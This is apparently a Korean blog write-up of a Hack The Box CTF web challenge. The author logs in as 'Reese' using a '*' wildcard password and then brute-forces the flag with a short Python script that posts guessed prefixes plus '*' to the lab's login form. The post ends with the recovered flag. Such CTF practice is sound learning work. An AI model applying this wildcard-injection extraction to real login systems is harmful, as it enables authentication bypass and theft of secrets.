이런 창이 나온다
이문제는 지훈이랑 같이 풀었는데 지훈이가 "Reese" 이게 U sername이 아니냐고 해서 Reese를 Username에다 박고 Password를 막 입력하다가 *를 입력하니까 로그인이 됬다.
근데 여기서 flag를 어디서 얻어야되는지 모르겠어서 승준이한테 코딩해서 풀어야되냐고 물어봤는데 해서 풀어야된데서 {flag}*이런식으로 브루트포스 해서 풀어야되는것 같아서 파이썬으로 코딩했다.
import requests
s =requests.session()
url = "http://167.99.88.212:31775/login"
data = {"username":"Reese", "password":""}
flag ='HTB{d'
while True:
for i in range(32, 128):
data = {"username":"Reese", "password":f"{flag}{chr(i)}*"}
if chr(i) == "*":
continue
a = s.post(url, data=data)
if "No search results." in a.text:
flag+=chr(i)
break
print(flag)
이렇게 flag가 뽑힌다.
HTB{d1rectory_h4xx0r_is_k00l}
'Hacking > HTB' 카테고리의 다른 글
| Mobile - Cat (0) | 2021.05.30 |
|---|---|
| Misc - misDIRection (0) | 2021.05.30 |
| WEB - Templated (0) | 2021.05.30 |
| WEB - Emdee five for life (0) | 2021.05.30 |